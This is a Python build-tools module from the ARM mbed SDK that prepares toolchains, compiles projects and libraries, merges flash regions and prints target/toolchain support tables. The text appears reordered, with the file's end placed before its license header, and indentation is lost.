tmp_path = join(MBED_LIBRARIES, '.temp', mbed2_obj_path(target.name, toolchain_name))
mkdir(tmp_path)
toolchain = prepare_toolchain(
[""], tmp_path, target, toolchain_name, macros=macros,verbose=verbose,
notify=notify, silent=silent, extra_verbose=extra_verbose,
build_profile=build_profile, jobs=jobs, clean=clean)
# Take into account the library configuration (MBED_CONFIG_FILE)
config = toolchain.config
config.add_config_files([MBED_CONFIG_FILE])
toolchain.set_config_data(toolchain.config.get_config_data())
# CMSIS
toolchain.info("Building library %s (%s, %s)" %
('CMSIS', target.name, toolchain_name))
cmsis_src = MBED_CMSIS_PATH
resources = toolchain.scan_resources(cmsis_src)
toolchain.copy_files(resources.headers, build_target)
toolchain.copy_files(resources.linker_script, build_toolchain)
toolchain.copy_files(resources.bin_files, build_toolchain)
objects = toolchain.compile_sources(resources, tmp_path)
toolchain.copy_files(objects, build_toolchain)
# mbed
toolchain.info("Building library %s (%s, %s)" %
('MBED', target.name, toolchain_name))
# Common Headers
toolchain.copy_files([MBED_HEADER], MBED_LIBRARIES)
library_incdirs = [dirname(MBED_LIBRARIES), MBED_LIBRARIES]
for dir, dest in [(MBED_DRIVERS, MBED_LIBRARIES_DRIVERS),
(MBED_PLATFORM, MBED_LIBRARIES_PLATFORM),
(MBED_HAL, MBED_LIBRARIES_HAL)]:
resources = toolchain.scan_resources(dir)
toolchain.copy_files(resources.headers, dest)
library_incdirs.append(dest)
# Target specific sources
hal_src = MBED_TARGETS_PATH
hal_implementation = toolchain.scan_resources(hal_src)
toolchain.copy_files(hal_implementation.headers +
hal_implementation.hex_files +
hal_implementation.libraries +
[MBED_CONFIG_FILE],
build_target, resources=hal_implementation)
toolchain.copy_files(hal_implementation.linker_script, build_toolchain)
toolchain.copy_files(hal_implementation.bin_files, build_toolchain)
incdirs = toolchain.scan_resources(build_target).inc_dirs
objects = toolchain.compile_sources(hal_implementation,
library_incdirs + incdirs)
toolchain.copy_files(objects, build_toolchain)
# Common Sources
mbed_resources = None
for dir in [MBED_DRIVERS, MBED_PLATFORM, MBED_HAL]:
mbed_resources += toolchain.scan_resources(dir)
objects = toolchain.compile_sources(mbed_resources,
library_incdirs + incdirs)
# A number of compiled files need to be copied as objects as opposed to
# way the linker search for symbols in archives. These are:
# - mbed_retarget.o: to make sure that the C standard lib symbols get
# overridden
# - mbed_board.o: mbed_die is weak
# - mbed_overrides.o: this contains platform overrides of various
# weak SDK functions
# - mbed_main.o: this contains main redirection
separate_names, separate_objects = ['mbed_retarget.o', 'mbed_board.o',
'mbed_overrides.o', 'mbed_main.o', 'mbed_sdk_boot.o'], []
for obj in objects:
for name in separate_names:
if obj.endswith(name):
separate_objects.append(obj)
for obj in separate_objects:
objects.remove(obj)
toolchain.build_library(objects, build_toolchain, "mbed")
for obj in separate_objects:
toolchain.copy_files(obj, build_toolchain)
if report != None:
end = time()
cur_result["elapsed_time"] = end - start
cur_result["output"] = toolchain.get_output()
cur_result["result"] = "OK"
add_result_to_report(report, cur_result)
return True
except Exception as exc:
if report != None:
end = time()
cur_result["result"] = "FAIL"
cur_result["elapsed_time"] = end - start
toolchain_output = toolchain.get_output()
if toolchain_output:
cur_result["output"] += toolchain_output
cur_result["output"] += str(exc)
add_result_to_report(report, cur_result)
# Let Exception propagate
raise
def get_unique_supported_toolchains(release_targets=None):
""" Get list of all unique toolchains supported by targets
Keyword arguments:
release_targets - tuple structure returned from get_mbed_official_release().
If release_targets is not specified, then it queries all
known targets
"""
unique_supported_toolchains = []
if not release_targets:
for target in TARGET_NAMES:
for toolchain in TARGET_MAP[target].supported_toolchains:
if toolchain not in unique_supported_toolchains:
unique_supported_toolchains.append(toolchain)
else:
for target in release_targets:
for toolchain in target[1]:
if toolchain not in unique_supported_toolchains:
unique_supported_toolchains.append(toolchain)
if "ARM" in unique_supported_toolchains:
unique_supported_toolchains.append("ARMC6")
return unique_supported_toolchains
def mcu_toolchain_list(release_version='5'):
""" Shows list of toolchains
"""
if isinstance(release_version, basestring):
# Force release_version to lowercase if it is a string
release_version = release_version.lower()
else:
# Otherwise default to printing all known targets and toolchains
release_version = 'all'
version_release_targets = {}
version_release_target_names = {}
for version in RELEASE_VERSIONS:
version_release_targets[version] = get_mbed_official_release(version)
version_release_target_names[version] = [x[0] for x in
version_release_targets[
version]]
if release_version in RELEASE_VERSIONS:
release_targets = version_release_targets[release_version]
else:
release_targets = None
unique_supported_toolchains = get_unique_supported_toolchains(
release_targets)
columns = ["mbed OS %s" % x for x in RELEASE_VERSIONS] + unique_supported_toolchains
return "\n".join(columns)
def mcu_target_list(release_version='5'):
""" Shows target list
"""
if isinstance(release_version, basestring):
# Force release_version to lowercase if it is a string
release_version = release_version.lower()
else:
# Otherwise default to printing all known targets and toolchains
release_version = 'all'
version_release_targets = {}
version_release_target_names = {}
for version in RELEASE_VERSIONS:
version_release_targets[version] = get_mbed_official_release(version)
version_release_target_names[version] = [x[0] for x in
version_release_targets[
version]]
if release_version in RELEASE_VERSIONS:
release_targets = version_release_targets[release_version]
else:
release_targets = None
target_names = []
if release_targets:
target_names = [x[0] for x in release_targets]
else:
target_names = TARGET_NAMES
return "\n".join(target_names)
def mcu_toolchain_matrix(verbose_html=False, platform_filter=None,
release_version='5'):
""" Shows target map using prettytable
Keyword arguments:
verbose_html - emit html instead of a simple table
platform_filter - remove results that match the string
release_version - get the matrix for this major version number
"""
# Only use it in this function so building works without extra modules
from prettytable import PrettyTable
if isinstance(release_version, basestring):
# Force release_version to lowercase if it is a string
release_version = release_version.lower()
else:
# Otherwise default to printing all known targets and toolchains
release_version = 'all'
version_release_targets = {}
version_release_target_names = {}
for version in RELEASE_VERSIONS:
version_release_targets[version] = get_mbed_official_release(version)
version_release_target_names[version] = [x[0] for x in
version_release_targets[
version]]
if release_version in RELEASE_VERSIONS:
release_targets = version_release_targets[release_version]
else:
release_targets = None
unique_supported_toolchains = get_unique_supported_toolchains(
release_targets)
prepend_columns = ["Target"] + ["mbed OS %s" % x for x in RELEASE_VERSIONS]
# All tests status table print
columns = prepend_columns + unique_supported_toolchains
table_printer = PrettyTable(columns)
# Align table
for col in columns:
table_printer.align[col] = "c"
table_printer.align["Target"] = "l"
perm_counter = 0
target_counter = 0
target_names = []
if release_targets:
target_names = [x[0] for x in release_targets]
else:
target_names = TARGET_NAMES
for target in sorted(target_names):
if platform_filter is not None:
# FIlter out platforms using regex
if re.search(platform_filter, target) is None:
continue
target_counter += 1
row = [target] # First column is platform name
for version in RELEASE_VERSIONS:
if target in version_release_target_names[version]:
text = "Supported"
else:
text = "-"
row.append(text)
for unique_toolchain in unique_supported_toolchains:
if (unique_toolchain in TARGET_MAP[target].supported_toolchains or
(unique_toolchain == "ARMC6" and
"ARM" in TARGET_MAP[target].supported_toolchains)):
text = "Supported"
perm_counter += 1
else:
text = "-"
row.append(text)
table_printer.add_row(row)
result = table_printer.get_html_string() if verbose_html \
else table_printer.get_string()
result += "\n"
result += "Supported targets: %d\n"% (target_counter)
if target_counter == 1:
result += "Supported toolchains: %d"% (perm_counter)
return result
def get_target_supported_toolchains(target):
""" Returns target supported toolchains list
Positional arguments:
target - the target to get the supported toolchains of
"""
return TARGET_MAP[target].supported_toolchains if target in TARGET_MAP \
else None
def print_build_results(result_list, build_name):
""" Generate result string for build results
Positional arguments:
result_list - the list of results to print
build_name - the name of the build we are printing result for
"""
result = ""
if len(result_list) > 0:
result += build_name + "\n"
result += "\n".join([" * %s" % f for f in result_list])
result += "\n"
return result
def print_build_memory_usage(report):
""" Generate result table with memory usage values for build results
Aggregates (puts together) reports obtained from self.get_memory_summary()
Positional arguments:
report - Report generated during build procedure.
"""
from prettytable import PrettyTable
columns_text = ['name', 'target', 'toolchain']
columns_int = ['static_ram', 'total_flash']
table = PrettyTable(columns_text + columns_int)
for col in columns_text:
table.align[col] = 'l'
for col in columns_int:
table.align[col] = 'r'
for target in report:
for toolchain in report[target]:
for name in report[target][toolchain]:
for dlist in report[target][toolchain][name]:
for dlistelem in dlist:
# Get 'memory_usage' record and build table with
# statistics
record = dlist[dlistelem]
if 'memory_usage' in record and record['memory_usage']:
# Note that summary should be in the last record of
# 'memory_usage' section. This is why we are
# grabbing last "[-1]" record.
row = [
record['description'],
record['target_name'],
record['toolchain_name'],
record['memory_usage'][-1]['summary'][
'static_ram'],
record['memory_usage'][-1]['summary'][
'total_flash'],
]
table.add_row(row)
result = "Memory map breakdown for built projects (values in Bytes):\n"
result += table.get_string(sortby='name')
return result
def write_build_report(build_report, template_filename, filename):
"""Write a build report to disk using a template file
Positional arguments:
build_report - a report generated by the build system
template_filename - a file that contains the template for the style of build
report
filename - the location on disk to write the file to
"""
build_report_failing = []
build_report_passing = []
for report in build_report:
if len(report["failing"]) > 0:
build_report_failing.append(report)
else:
build_report_passing.append(report)
env = Environment(extensions=['jinja2.ext.with_'])
env.loader = FileSystemLoader('ci_templates')
template = env.get_template(template_filename)
with open(filename, 'w+') as placeholder:
placeholder.write(template.render(
failing_builds=build_report_failing,
passing_builds=build_report_passing))
def merge_build_data(filename, toolchain_report, app_type):
path_to_file = dirname(abspath(filename))
try:
build_data = load(open(filename))
except (IOError, ValueError):
build_data = {'builds': []}
for tgt in toolchain_report.values():
for tc in tgt.values():
for project in tc.values():
for build in project:
try:
build[0]['elf'] = relpath(build[0]['elf'], path_to_file)
build[0]['bin'] = relpath(build[0]['bin'], path_to_file)
except KeyError:
pass
if 'type' not in build[0]:
build[0]['type'] = app_type
build_data['builds'].append(build[0])
dump(build_data, open(filename, "wb"), indent=4, separators=(',', ': '))
| 38.458333
| 101
| 0.635676
|
"""
mbed SDK
Copyright (c) 2011-2016 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import re
import tempfile
import datetime
import uuid
from types import ListType
from shutil import rmtree
from os.path import join, exists, dirname, basename, abspath, normpath, splitext
from os.path import relpath
from os import linesep, remove, makedirs
from time import time
from intelhex import IntelHex
from json import load, dump
from tools.utils import mkdir, run_cmd, run_cmd_ext, NotSupportedException,\
ToolException, InvalidReleaseTargetException, intelhex_offset
from tools.paths import MBED_CMSIS_PATH, MBED_TARGETS_PATH, MBED_LIBRARIES,\
MBED_HEADER, MBED_DRIVERS, MBED_PLATFORM, MBED_HAL, MBED_CONFIG_FILE,\
MBED_LIBRARIES_DRIVERS, MBED_LIBRARIES_PLATFORM, MBED_LIBRARIES_HAL,\
BUILD_DIR
from tools.targets import TARGET_NAMES, TARGET_MAP
from tools.libraries import Library
from tools.toolchains import TOOLCHAIN_CLASSES
from jinja2 import FileSystemLoader
from jinja2.environment import Environment
from tools.config import Config
RELEASE_VERSIONS = ['2', '5']
def prep_report(report, target_name, toolchain_name, id_name):
"""Setup report keys
Positional arguments:
report - the report to fill
target_name - the target being used
toolchain_name - the toolchain being used
id_name - the name of the executable or library being built
"""
if not target_name in report:
report[target_name] = {}
if not toolchain_name in report[target_name]:
report[target_name][toolchain_name] = {}
if not id_name in report[target_name][toolchain_name]:
report[target_name][toolchain_name][id_name] = []
def prep_properties(properties, target_name, toolchain_name, vendor_label):
"""Setup test properties
Positional arguments:
properties - the dict to fill
target_name - the target the test is targeting
toolchain_name - the toolchain that will compile the test
vendor_label - the vendor
"""
if not target_name in properties:
properties[target_name] = {}
if not toolchain_name in properties[target_name]:
properties[target_name][toolchain_name] = {}
properties[target_name][toolchain_name]["target"] = target_name
properties[target_name][toolchain_name]["vendor"] = vendor_label
properties[target_name][toolchain_name]["toolchain"] = toolchain_name
def create_result(target_name, toolchain_name, id_name, description):
"""Create a result dictionary
Positional arguments:
target_name - the target being built for
toolchain_name - the toolchain doing the building
id_name - the name of the executable or library being built
description - a human readable description of what's going on
"""
cur_result = {}
cur_result["target_name"] = target_name
cur_result["toolchain_name"] = toolchain_name
cur_result["id"] = id_name
cur_result["description"] = description
cur_result["elapsed_time"] = 0
cur_result["output"] = ""
return cur_result
def add_result_to_report(report, result):
"""Add a single result to a report dictionary
Positional arguments:
report - the report to append to
result - the result to append
"""
result["date"] = datetime.datetime.utcnow().isoformat()
result["uuid"] = str(uuid.uuid1())
target = result["target_name"]
toolchain = result["toolchain_name"]
id_name = result['id']
result_wrap = {0: result}
report[target][toolchain][id_name].append(result_wrap)
def get_config(src_paths, target, toolchain_name):
"""Get the configuration object for a target-toolchain combination
Positional arguments:
src_paths - paths to scan for the configuration files
target - the device we are building for
toolchain_name - the string that identifies the build tools
"""
# Convert src_paths to a list if needed
if type(src_paths) != ListType:
src_paths = [src_paths]
# Pass all params to the unified prepare_resources()
toolchain = prepare_toolchain(src_paths, None, target, toolchain_name)
# Scan src_path for config files
resources = toolchain.scan_resources(src_paths[0])
for path in src_paths[1:]:
resources.add(toolchain.scan_resources(path))
# Update configuration files until added features creates no changes
prev_features = set()
while True:
# Update the configuration with any .json files found while scanning
toolchain.config.add_config_files(resources.json_files)
# Add features while we find new ones
features = set(toolchain.config.get_features())
if features == prev_features:
break
for feature in features:
if feature in resources.features:
resources += resources.features[feature]
prev_features = features
toolchain.config.validate_config()
if toolchain.config.has_regions:
_ = list(toolchain.config.regions)
cfg, macros = toolchain.config.get_config_data()
features = toolchain.config.get_features()
return cfg, macros, features
def is_official_target(target_name, version):
""" Returns True, None if a target is part of the official release for the
given version. Return False, 'reason' if a target is not part of the
official release for the given version.
Positional arguments:
target_name - Name if the target (ex. 'K64F')
version - The release version string. Should be a string contained within
RELEASE_VERSIONS
"""
result = True
reason = None
target = TARGET_MAP[target_name]
if hasattr(target, 'release_versions') \
and version in target.release_versions:
if version == '2':
# For version 2, either ARM or uARM toolchain support is required
required_toolchains = set(['ARM', 'uARM'])
if not len(required_toolchains.intersection(
set(target.supported_toolchains))) > 0:
result = False
reason = ("Target '%s' must support " % target.name) + \
("one of the folowing toolchains to be included in the") + \
((" mbed 2.0 official release: %s" + linesep) %
", ".join(required_toolchains)) + \
("Currently it is only configured to support the ") + \
("following toolchains: %s" %
", ".join(target.supported_toolchains))
elif version == '5':
# For version 5, ARM, GCC_ARM, and IAR toolchain support is required
required_toolchains = set(['ARM', 'GCC_ARM', 'IAR'])
required_toolchains_sorted = list(required_toolchains)
required_toolchains_sorted.sort()
supported_toolchains = set(target.supported_toolchains)
supported_toolchains_sorted = list(supported_toolchains)
supported_toolchains_sorted.sort()
if not required_toolchains.issubset(supported_toolchains):
result = False
reason = ("Target '%s' must support " % target.name) + \
("ALL of the folowing toolchains to be included in the") + \
((" mbed OS 5.0 official release: %s" + linesep) %
", ".join(required_toolchains_sorted)) + \
("Currently it is only configured to support the ") + \
("following toolchains: %s" %
", ".join(supported_toolchains_sorted))
elif not target.default_lib == 'std':
result = False
reason = ("Target '%s' must set the " % target.name) + \
("'default_lib' to 'std' to be included in the ") + \
("mbed OS 5.0 official release." + linesep) + \
("Currently it is set to '%s'" % target.default_lib)
else:
result = False
reason = ("Target '%s' has set an invalid release version of '%s'" %
version) + \
("Please choose from the following release versions: %s" %
', '.join(RELEASE_VERSIONS))
else:
result = False
if not hasattr(target, 'release_versions'):
reason = "Target '%s' " % target.name
reason += "does not have the 'release_versions' key set"
elif not version in target.release_versions:
reason = "Target '%s' does not contain the version '%s' " % \
(target.name, version)
reason += "in its 'release_versions' key"
return result, reason
def transform_release_toolchains(toolchains, version):
""" Given a list of toolchains and a release version, return a list of
only the supported toolchains for that release
Positional arguments:
toolchains - The list of toolchains
version - The release version string. Should be a string contained within
RELEASE_VERSIONS
"""
if version == '5':
return ['ARM', 'GCC_ARM', 'IAR']
else:
return toolchains
def get_mbed_official_release(version):
""" Given a release version string, return a tuple that contains a target
and the supported toolchains for that release.
Ex. Given '2', return (('LPC1768', ('ARM', 'GCC_ARM')),
('K64F', ('ARM', 'GCC_ARM')), ...)
Positional arguments:
version - The version string. Should be a string contained within
RELEASE_VERSIONS
"""
mbed_official_release = (
tuple(
tuple(
[
TARGET_MAP[target].name,
tuple(transform_release_toolchains(
TARGET_MAP[target].supported_toolchains, version))
]
) for target in TARGET_NAMES \
if (hasattr(TARGET_MAP[target], 'release_versions')
and version in TARGET_MAP[target].release_versions)
)
)
for target in mbed_official_release:
is_official, reason = is_official_target(target[0], version)
if not is_official:
raise InvalidReleaseTargetException(reason)
return mbed_official_release
def add_regions_to_profile(profile, config, toolchain_class):
"""Add regions to the build profile, if there are any.
Positional Arguments:
profile - the profile to update
config - the configuration object that owns the region
toolchain_class - the class of the toolchain being used
"""
if not profile:
return
regions = list(config.regions)
for region in regions:
for define in [(region.name.upper() + "_ADDR", region.start),
(region.name.upper() + "_SIZE", region.size)]:
profile["common"].append("-D%s=0x%x" % define)
active_region = [r for r in regions if r.active][0]
for define in [("MBED_APP_START", active_region.start),
("MBED_APP_SIZE", active_region.size)]:
profile["ld"].append(toolchain_class.make_ld_define(*define))
print("Using regions in this build:")
for region in regions:
print(" Region %s size 0x%x, offset 0x%x"
% (region.name, region.size, region.start))
def prepare_toolchain(src_paths, build_dir, target, toolchain_name,
macros=None, clean=False, jobs=1,
notify=None, silent=False, verbose=False,
extra_verbose=False, config=None,
app_config=None, build_profile=None):
""" Prepares resource related objects - toolchain, target, config
Positional arguments:
src_paths - the paths to source directories
target - ['LPC1768', 'LPC11U24', etc.]
toolchain_name - ['ARM', 'uARM', 'GCC_ARM', 'GCC_CR']
Keyword arguments:
macros - additional macros
clean - Rebuild everything if True
jobs - how many compilers we can run at once
notify - Notify function for logs
silent - suppress printing of progress indicators
verbose - Write the actual tools command lines used if True
extra_verbose - even more output!
config - a Config object to use instead of creating one
app_config - location of a chosen mbed_app.json file
build_profile - a list of mergeable build profiles
"""
# We need to remove all paths which are repeated to avoid
# multiple compilations and linking with the same objects
src_paths = [src_paths[0]] + list(set(src_paths[1:]))
# If the configuration object was not yet created, create it now
config = config or Config(target, src_paths, app_config=app_config)
target = config.target
try:
cur_tc = TOOLCHAIN_CLASSES[toolchain_name]
except KeyError:
raise KeyError("Toolchain %s not supported" % toolchain_name)
profile = {'c': [], 'cxx': [], 'common': [], 'asm': [], 'ld': []}
for contents in build_profile or []:
for key in profile:
profile[key].extend(contents[toolchain_name][key])
if config.has_regions:
add_regions_to_profile(profile, config, cur_tc)
toolchain = cur_tc(target, notify, macros, silent, build_dir=build_dir,
extra_verbose=extra_verbose, build_profile=profile)
toolchain.config = config
toolchain.jobs = jobs
toolchain.build_all = clean
toolchain.VERBOSE = verbose
return toolchain
def merge_region_list(region_list, destination, padding=b'\xFF'):
"""Merege the region_list into a single image
Positional Arguments:
region_list - list of regions, which should contain filenames
destination - file name to write all regions to
padding - bytes to fill gapps with
"""
merged = IntelHex()
print("Merging Regions:")
for region in region_list:
if region.active and not region.filename:
raise ToolException("Active region has no contents: No file found.")
if region.filename:
print(" Filling region %s with %s" % (region.name, region.filename))
part = intelhex_offset(region.filename, offset=region.start)
part_size = (part.maxaddr() - part.minaddr()) + 1
if part_size > region.size:
raise ToolException("Contents of region %s does not fit"
% region.name)
merged.merge(part)
pad_size = region.size - part_size
if pad_size > 0 and region != region_list[-1]:
print(" Padding region %s with 0x%x bytes" % (region.name, pad_size))
merged.puts(merged.maxaddr() + 1, padding * pad_size)
if not exists(dirname(destination)):
makedirs(dirname(destination))
print("Space used after regions merged: 0x%x" %
(merged.maxaddr() - merged.minaddr() + 1))
with open(destination, "wb+") as output:
merged.tofile(output, format='bin')
def scan_resources(src_paths, toolchain, dependencies_paths=None,
inc_dirs=None, base_path=None, collect_ignores=False):
""" Scan resources using initialized toolcain
Positional arguments
src_paths - the paths to source directories
toolchain - valid toolchain object
dependencies_paths - dependency paths that we should scan for include dirs
inc_dirs - additional include directories which should be added to
the scanner resources
"""
# Scan src_path
resources = toolchain.scan_resources(src_paths[0], base_path=base_path,
collect_ignores=collect_ignores)
for path in src_paths[1:]:
resources.add(toolchain.scan_resources(path, base_path=base_path,
collect_ignores=collect_ignores))
# Scan dependency paths for include dirs
if dependencies_paths is not None:
for path in dependencies_paths:
lib_resources = toolchain.scan_resources(path)
resources.inc_dirs.extend(lib_resources.inc_dirs)
# Add additional include directories if passed
if inc_dirs:
if type(inc_dirs) == ListType:
resources.inc_dirs.extend(inc_dirs)
else:
resources.inc_dirs.append(inc_dirs)
# Load resources into the config system which might expand/modify resources
# based on config data
resources = toolchain.config.load_resources(resources)
# Set the toolchain's configuration data
toolchain.set_config_data(toolchain.config.get_config_data())
if (hasattr(toolchain.target, "release_versions") and
"5" not in toolchain.target.release_versions and
"rtos" in toolchain.config.lib_config_data):
if "Cortex-A" in toolchain.target.core:
raise NotSupportedException(
("%s Will be supported in mbed OS 5.6. "
"To use the %s, please checkout the mbed OS 5.4 release branch. "
"See https://developer.mbed.org/platforms/Renesas-GR-PEACH/#important-notice "
"for more information") % (toolchain.target.name, toolchain.target.name))
else:
raise NotSupportedException("Target does not support mbed OS 5")
return resources
def build_project(src_paths, build_path, target, toolchain_name,
libraries_paths=None, linker_script=None,
clean=False, notify=None, verbose=False, name=None,
macros=None, inc_dirs=None, jobs=1, silent=False,
report=None, properties=None, project_id=None,
project_description=None, extra_verbose=False, config=None,
app_config=None, build_profile=None, stats_depth=None):
""" Build a project. A project may be a test or a user program.
Positional arguments:
src_paths - a path or list of paths that contain all files needed to build
the project
build_path - the directory where all of the object files will be placed
target - the MCU or board that the project will compile for
toolchain_name - the name of the build tools
Keyword arguments:
libraries_paths - The location of libraries to include when linking
linker_script - the file that drives the linker to do it's job
clean - Rebuild everything if True
notify - Notify function for logs
verbose - Write the actual tools command lines used if True
name - the name of the project
macros - additional macros
inc_dirs - additional directories where include files may be found
jobs - how many compilers we can run at once
silent - suppress printing of progress indicators
report - a dict where a result may be appended
properties - UUUUHHHHH beats me
project_id - the name put in the report
project_description - the human-readable version of what this thing does
extra_verbose - even more output!
config - a Config object to use instead of creating one
app_config - location of a chosen mbed_app.json file
build_profile - a dict of flags that will be passed to the compiler
stats_depth - depth level for memap to display file/dirs
"""
# Convert src_path to a list if needed
if type(src_paths) != ListType:
src_paths = [src_paths]
# Extend src_paths wiht libraries_paths
if libraries_paths is not None:
src_paths.extend(libraries_paths)
inc_dirs.extend(map(dirname, libraries_paths))
if clean and exists(build_path):
rmtree(build_path)
mkdir(build_path)
toolchain = prepare_toolchain(
src_paths, build_path, target, toolchain_name, macros=macros,
clean=clean, jobs=jobs, notify=notify, silent=silent, verbose=verbose,
extra_verbose=extra_verbose, config=config, app_config=app_config,
build_profile=build_profile)
# The first path will give the name to the library
name = (name or toolchain.config.name or
basename(normpath(abspath(src_paths[0]))))
toolchain.info("Building project %s (%s, %s)" %
(name, toolchain.target.name, toolchain_name))
# Initialize reporting
if report != None:
start = time()
# If project_id is specified, use that over the default name
id_name = project_id.upper() if project_id else name.upper()
description = project_description if project_description else name
vendor_label = toolchain.target.extra_labels[0]
prep_report(report, toolchain.target.name, toolchain_name, id_name)
cur_result = create_result(toolchain.target.name, toolchain_name,
id_name, description)
if properties != None:
prep_properties(properties, toolchain.target.name, toolchain_name,
vendor_label)
try:
# Call unified scan_resources
resources = scan_resources(src_paths, toolchain, inc_dirs=inc_dirs)
# Change linker script if specified
if linker_script is not None:
resources.linker_script = linker_script
# Compile Sources
objects = toolchain.compile_sources(resources, resources.inc_dirs)
resources.objects.extend(objects)
# Link Program
if toolchain.config.has_regions:
res, _ = toolchain.link_program(resources, build_path, name + "_application")
region_list = list(toolchain.config.regions)
region_list = [r._replace(filename=res) if r.active else r
for r in region_list]
res = join(build_path, name) + ".bin"
merge_region_list(region_list, res)
else:
res, _ = toolchain.link_program(resources, build_path, name)
memap_instance = getattr(toolchain, 'memap_instance', None)
memap_table = ''
if memap_instance:
# Write output to stdout in text (pretty table) format
memap_table = memap_instance.generate_output('table', stats_depth)
if not silent:
print memap_table
# Write output to file in JSON format
map_out = join(build_path, name + "_map.json")
memap_instance.generate_output('json', stats_depth, map_out)
# Write output to file in CSV format for the CI
map_csv = join(build_path, name + "_map.csv")
memap_instance.generate_output('csv-ci', stats_depth, map_csv)
resources.detect_duplicates(toolchain)
if report != None:
end = time()
cur_result["elapsed_time"] = end - start
cur_result["output"] = toolchain.get_output() + memap_table
cur_result["result"] = "OK"
cur_result["memory_usage"] = memap_instance.mem_report
cur_result["bin"] = res
cur_result["elf"] = splitext(res)[0] + ".elf"
cur_result.update(toolchain.report)
add_result_to_report(report, cur_result)
return res
except Exception as exc:
if report != None:
end = time()
if isinstance(exc, NotSupportedException):
cur_result["result"] = "NOT_SUPPORTED"
else:
cur_result["result"] = "FAIL"
cur_result["elapsed_time"] = end - start
toolchain_output = toolchain.get_output()
if toolchain_output:
cur_result["output"] += toolchain_output
add_result_to_report(report, cur_result)
# Let Exception propagate
raise
def build_library(src_paths, build_path, target, toolchain_name,
dependencies_paths=None, name=None, clean=False,
archive=True, notify=None, verbose=False, macros=None,
inc_dirs=None, jobs=1, silent=False, report=None,
properties=None, extra_verbose=False, project_id=None,
remove_config_header_file=False, app_config=None,
build_profile=None):
""" Build a library
Positional arguments:
src_paths - a path or list of paths that contain all files needed to build
the library
build_path - the directory where all of the object files will be placed
target - the MCU or board that the project will compile for
toolchain_name - the name of the build tools
Keyword arguments:
dependencies_paths - The location of libraries to include when linking
name - the name of the library
clean - Rebuild everything if True
archive - whether the library will create an archive file
notify - Notify function for logs
verbose - Write the actual tools command lines used if True
macros - additional macros
inc_dirs - additional directories where include files may be found
jobs - how many compilers we can run at once
silent - suppress printing of progress indicators
report - a dict where a result may be appended
properties - UUUUHHHHH beats me
extra_verbose - even more output!
project_id - the name that goes in the report
remove_config_header_file - delete config header file when done building
app_config - location of a chosen mbed_app.json file
build_profile - a dict of flags that will be passed to the compiler
"""
# Convert src_path to a list if needed
if type(src_paths) != ListType:
src_paths = [src_paths]
# Build path
if archive:
# Use temp path when building archive
tmp_path = join(build_path, '.temp')
mkdir(tmp_path)
else:
tmp_path = build_path
# Clean the build directory
if clean and exists(tmp_path):
rmtree(tmp_path)
mkdir(tmp_path)
# Pass all params to the unified prepare_toolchain()
toolchain = prepare_toolchain(
src_paths, build_path, target, toolchain_name, macros=macros,
clean=clean, jobs=jobs, notify=notify, silent=silent,
verbose=verbose, extra_verbose=extra_verbose, app_config=app_config,
build_profile=build_profile)
# The first path will give the name to the library
if name is None:
name = basename(normpath(abspath(src_paths[0])))
toolchain.info("Building library %s (%s, %s)" %
(name, toolchain.target.name, toolchain_name))
# Initialize reporting
if report != None:
start = time()
# If project_id is specified, use that over the default name
id_name = project_id.upper() if project_id else name.upper()
description = name
vendor_label = toolchain.target.extra_labels[0]
prep_report(report, toolchain.target.name, toolchain_name, id_name)
cur_result = create_result(toolchain.target.name, toolchain_name,
id_name, description)
cur_result['type'] = 'library'
if properties != None:
prep_properties(properties, toolchain.target.name, toolchain_name,
vendor_label)
for src_path in src_paths:
if not exists(src_path):
error_msg = "The library source folder does not exist: %s", src_path
if report != None:
cur_result["output"] = error_msg
cur_result["result"] = "FAIL"
add_result_to_report(report, cur_result)
raise Exception(error_msg)
try:
# Call unified scan_resources
resources = scan_resources(src_paths, toolchain,
dependencies_paths=dependencies_paths,
inc_dirs=inc_dirs)
# Copy headers, objects and static libraries - all files needed for
# static lib
toolchain.copy_files(resources.headers, build_path, resources=resources)
toolchain.copy_files(resources.objects, build_path, resources=resources)
toolchain.copy_files(resources.libraries, build_path,
resources=resources)
toolchain.copy_files(resources.json_files, build_path,
resources=resources)
if resources.linker_script:
toolchain.copy_files(resources.linker_script, build_path,
resources=resources)
if resources.hex_files:
toolchain.copy_files(resources.hex_files, build_path,
resources=resources)
# Compile Sources
objects = toolchain.compile_sources(resources, resources.inc_dirs)
resources.objects.extend(objects)
if archive:
toolchain.build_library(objects, build_path, name)
if remove_config_header_file:
config_header_path = toolchain.get_config_header()
if config_header_path:
remove(config_header_path)
if report != None:
end = time()
cur_result["elapsed_time"] = end - start
cur_result["output"] = toolchain.get_output()
cur_result["result"] = "OK"
add_result_to_report(report, cur_result)
return True
except Exception as exc:
if report != None:
end = time()
if isinstance(exc, ToolException):
cur_result["result"] = "FAIL"
elif isinstance(exc, NotSupportedException):
cur_result["result"] = "NOT_SUPPORTED"
cur_result["elapsed_time"] = end - start
toolchain_output = toolchain.get_output()
if toolchain_output:
cur_result["output"] += toolchain_output
add_result_to_report(report, cur_result)
# Let Exception propagate
raise
######################
### Legacy methods ###
######################
def mbed2_obj_path(target_name, toolchain_name):
real_tc_name = TOOLCHAIN_CLASSES[toolchain_name].__name__
return join("TARGET_" + target_name, "TOOLCHAIN_" + real_tc_name)
def build_lib(lib_id, target, toolchain_name, verbose=False,
clean=False, macros=None, notify=None, jobs=1, silent=False,
report=None, properties=None, extra_verbose=False,
build_profile=None):
""" Legacy method for building mbed libraries
Positional arguments:
lib_id - the library's unique identifier
target - the MCU or board that the project will compile for
toolchain_name - the name of the build tools
Keyword arguments:
clean - Rebuild everything if True
verbose - Write the actual tools command lines used if True
macros - additional macros
notify - Notify function for logs
jobs - how many compilers we can run at once
silent - suppress printing of progress indicators
report - a dict where a result may be appended
properties - UUUUHHHHH beats me
extra_verbose - even more output!
build_profile - a dict of flags that will be passed to the compiler
"""
lib = Library(lib_id)
if not lib.is_supported(target, toolchain_name):
print('Library "%s" is not yet supported on target %s with toolchain %s'
% (lib_id, target.name, toolchain_name))
return False
lib_macros = lib.macros if lib.macros else []
if macros:
macros.extend(lib_macros)
else:
macros = lib_macros
src_paths = lib.source_dir
build_path = lib.build_dir
dependencies_paths = lib.dependencies
inc_dirs = lib.inc_dirs
